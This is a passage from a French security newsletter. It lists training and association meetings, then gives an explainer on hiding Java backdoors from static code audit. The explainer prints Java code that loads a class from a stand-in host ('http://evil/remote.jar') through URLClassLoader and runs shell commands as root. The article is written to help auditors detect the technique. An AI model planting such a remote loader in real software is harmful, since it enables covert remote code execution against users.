Tél : +352 25 48 25 321 -- GSM : +352 621 31 20 88 -- Fax : +352 25 48 30
Retrouvez les tarifs des formations dans la Newsletter n° 64 de janvier 2010
au chapitre 6 : http://www.hsc-news.com/archives/2010/000064.html
Vous souhaitez des formations dans votre ville ? Contactez Hervé Schauer,
HSC est allé donné des formations inter-entreprises à Marseille, Niort,
Papeete, Rennes, etc à la demande des entreprises locales.
Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
notre catalogue en PDF sur http://www.hsc-formation.fr/
--[ 11. Actualité des associations : Club 27001 et OSSIR ]---------------
o Club 27001 (http://www.club-27001.fr/)
. Prochaine réunion à Paris le jeudi 16 septembre
- Utilisation du logiciel de gestion des risques RVR à La Poste
par Carine Cabalo-Siarri et Patrick Langrand
(en cours de confirmation)
. Conférence annuelle du Club 27001 le 30 novembre 2010
. Prochaine réunion à Toulouse vendredi 17 septembre
- Point sur les normes pa Claire Albouy Cossard
- Définition du SMSI d'un regroupement de services européens
de navigation aérienne par Philippe Morio, DSNA
- Expérience sur une analyse de risque 27005 par Philippe
Morio et Jeanne Rabaute
. Prochaine réunion à Marseille annoncée prochainement
. Prochaine réunion à Rennes annoncée prochainement
Inscrivez-vous sur la liste de Toulouse, Marseille, etc. sur
www.club-27001.fr pour avoir l'activité des clubs en région.
o OSSIR (http://www.ossir.org/)
. Prochaine réunion à Paris mardi 14 septembre
- Zscaler par Damien Charette et Frédéric Benichou (Zscaler)
- Compte-rendu des conférences Blackhat & Defcon Las Vegas
par Jean-Baptiste Aviat et Yves Le Provost (HSC)
. Réunion suivante à Paris mardi 12 octobre
- Le framework Digital-Forensics par Solal Jacob (ArxSys)
- présentation par ExoSec (en cours de confirmation)
. Prochaine réunion à Toulouse mardi 21 septembre
. Prochaine réunion à Rennes en fin d'année
. Prochaine réunion à Lyon au dernier trimestre
--[ 12. Le saviez vous ? La réponse ]------------------------------------
Lors d'audit statique de code, bon nombre d'auditeurs recherchent en
priorité l'utilisation d'objets à risque (Runtime, ProcessBuilder, etc.).
Cependant, un développeur malveillant suffisament malin prendra généralement
toutes les précautions nécessaires pour cacher sa porte dérobée aux yeux des
potentiels auditeurs.
Pour arriver à ces fins, plusieurs moyens existent: insertion de Valves sous
Tomcat, utilisation de fichiers .properties, etc. Ces solutions nécessitent
cependant que le code malveillant soit tout de même présent au sein de
l'application sous forme de .jar ou de .class très souvent caché dans un
répertoire obscur du framework utilisé. Dans ces conditions, le code
malveillant ne résistera pas très longtemps aux "grep" et décompilations
acharnées d'un auditeur motivé.
Une alternative permet cependant d'éviter ce désagrément : charger
dynamiquement au sein du programme en cours d'exécution des .jar ou .class
hébergés sur un serveur distant à l'aide d'un chargeur de classes
spécifiquement prévu à cet effet : l'URLClassLoader. Ce classloader est
disponible depuis Java 1.2 [1] et a pour caractèristique d'aller récupérer
les .jar ou .class situés aux URL (distantes ou non) qui lui ont été
fournies lors de son instanciation. Une fois chargées, les classes
récupérées peuvent être instanciées et invoquées en utilisant le mécanisme
de réflexion fournit par Java :
try{
/* Construction des URL où chercher */
URL[] classUrls = {
new URL("http://evil/remote.jar")
};
/* Instanciation du classloader avec les URL */
URLClassLoader urlLoader = new URLClassLoader(classUrls);
/* Chargement et instanciation de la classe malveillante */
Class cls = urlLoader.loadClass("hsc.Remote");
Object malicious = cls.newInstance();
/* Invocation de la méthode malveillante */
Method maliciousMethod = cls.getMethod("print");
System.out.println(maliciousMethod.invoke(malicious));
} catch(Exception e) {
e.printStackTrace();
}
Le code malveillant n'est plus présent ni dans l'application ni dans une
bibliothèque du classpath et réalise pourtant des opérations potentiellement
malveillantes :
package hsc;
import java.io.*;
public class Remote {
public String print() {
Process proc;
BufferedReader output;
StringBuilder result = new StringBuilder();
String[] cmdArray = {"/bin/bash", "-c", "id"};
try {
proc = Runtime.getRuntime().exec(cmdArray);
output = new BufferedReader(
new InputStreamReader(proc.getInputStream())
);
char buffer[] = new char[8192];
int lenRead;
while ((lenRead = output.read(buffer, 0, buffer.length)) > 0) {
for (int i = 0; i < lenRead; i++) {
result.append(buffer[i]);
}
}
} catch (Exception e) {
e.printStackTrace();
}
return result.toString();
}
}
et ceci directement sur le système sur lequel le programme est lancé :
# java Hello
uid=0(root) gid=0(root) groupes=0(root)
Combinée à des techniques de camouflages avancées permettant l'appel du
logiciel malveillant sans que celui-ci soit spécifiquement appelé au sein du
code légitime [2], cette méthode peut être particulièrement redoutable. Il
est donc important d'inclure dans le processus d'audit statique, la détection
de l'utilisation de telles fonctionnalités.
-- Renaud Dubourguais
[1] http://download.oracle.com/javase/1.4.2/docs/api/java/net/URLClassLoader.html
[2] http://actes.sstic.org/SSTIC09/Porte_derobee_dans_les_serveurs_applications_JavaEE/SSTIC09-article-P-Prados-Porte_derobee_dans_les_serveurs_d-applications_JavaEE.pdf
Plus d'informations sur la liste de diffusion newsletter